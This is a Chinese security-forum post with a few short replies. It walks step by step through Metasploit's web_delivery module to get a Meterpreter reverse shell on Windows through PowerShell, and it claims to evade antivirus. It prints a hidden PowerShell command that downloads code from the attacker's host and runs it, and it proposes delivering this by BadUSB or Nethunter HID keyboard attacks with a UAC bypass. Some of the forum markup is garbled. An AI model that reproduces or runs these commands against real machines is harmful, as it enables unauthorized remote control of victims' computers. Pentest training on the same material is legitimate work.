用户
搜索

该用户从未签到

安全团队

Rank: 7Rank: 7Rank: 7

36

主题

176

帖子

272

魔法币
收听
3
粉丝
21
注册时间
2016-8-17

i春秋认证春秋文阁

发表于 2017-3-27 13:38:16 540284
Metasploit后门免杀模块之绕过某安全防护



由于时间和工作上的关系,文章很少更新,望各位多多谅解,多谢各位支持。

本文使用的是Metasploit与powershell结合。
适合在windows上拥有powershell的机子。

文中提到的内容------演示视频----
http://oc78wb8cz.bkt.clouddn.com/msf_web_delivery.mp4

Metasploit后门模块步骤解说

第一步选择使用 msf web_delivery模块:


[Shell] 纯文本查看 复制代码
use exploit/multi/script/web_delivery


第二步使用show opinions 查看相关配置参数:


[Shell] 纯文本查看 复制代码
show options


可看到下列参数:需要选择的是target、payload选项(包含ip以及端口)、uripath等



第三步查看 target 包含多少可选的目标选项,使用以下参数查看:


[Shell] 纯文本查看 复制代码
    show targets


可以看到这里支持:Python/PHP/powershell 三种脚本。




第四步设置 target 这里我们选择 2 powershell 脚本。


[Shell] 纯文本查看 复制代码
set payload windows/meterpreter/reverse_tcp



第五步设置 payload 选项,设置 windows(powershell)反弹


shell 链接:


[Shell] 纯文本查看 复制代码
set payload windows/meterpreter/reverse_tcp


第六步设置攻击者-端口默认是:4444 也可以更改,这里我就直接使

用默认端口:


[Shell] 纯文本查看 复制代码
   set LHOST 192.168.1.101


第七步设置 uripath 路径 设置为根目录—– ‘/‘


[Shell] 纯文本查看 复制代码
[/size][/p][p=24, null, left][size=4][color=#ff0000]
[/color][/size][/p][p=24, null, left][size=4][b][color=#ff0000]第八步[/color][color=#333333]:[/color][/b][color=#333333]执行[/color][/size][/p][p=24, null, left][size=4][color=rgb(51, 51, 51)]
[/color][/size][/p][size=4]  [mw_shl_code=shell,true] exploit


第九步将以下生成的代码,复制到目标机器的 cmd 命令终端窗口内

(思路:可以结合“Badusb”使用)。


[Shell] 纯文本查看 复制代码
  powershell.exe -nop -w hidden -c $O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials[Net.CredentialCache]:efaultCredentials;IEX $O.downloadstring(‘[url=http://192.168.1.101:8080/]http://192.168.1.101:8080/[/url]‘);





文末彩蛋http://www.ggsec.cn/nethuner-HID.html--可查看视频    黑手之kali_Nethuner---HID攻击

HID攻击介绍
HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口,只要符合HID类别规范的设备都是HID设备。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。


第十步:打开 kali_Nethunter 客户端界面,开启 apache 等服务,并对代码进行基本的参数设置

.首先我们选择菜单界面的 HID Attacks 选项。




2.可以看到,这里有过windows UAC的选项及相关操作选项。




3.我们点击UAC bypass选项,要求我们选择对应的windows版本,这里我选择Windows10





4.我们结合msf下的web_delivery模块执行攻击:


[Shell] 纯文本查看 复制代码
exploit/multi/script/web_delivery



5.从被动到主动,主动/自动展开攻击,最终得到我们想要的meterpreter shell



值得说的是 我博客中加入了终端视频录制,里面的视频代码可复制,代码可复制。这边我就不加这个视频了。如果有兴趣的话可以关注我的msf系列课程,一小部分的metasploit之恶作剧三部曲。扫一扫二维码,关注即刻安全-----亦可访问官网博客www.secist.com! 我是Demon,一名即刻安全团队的成员,多谢支持















发表于 2017-3-28 16:22:47
Nethunter 黑手 视频:链接: http://pan.baidu.com/s/1geJf5vH 密码: 9v8w
使用道具 举报 回复
发表于 2017-4-1 11:10:17
学习一下
提莫队长正在待命
使用道具 举报 回复
发表于 2017-4-2 23:50:40

感谢支持
使用道具 举报 回复
发表于 2017-4-5 19:30:59
不好意思,没看到绕过啥防护
使用道具 举报 回复
发表于 2017-4-6 13:47:26
icqf74b0bd7 发表于 2017-4-5 19:30
不好意思,没看到绕过啥防护

看视频就知道了  
使用道具 举报 回复
发新帖
您需要登录后才可以回帖 登录 | 立即注册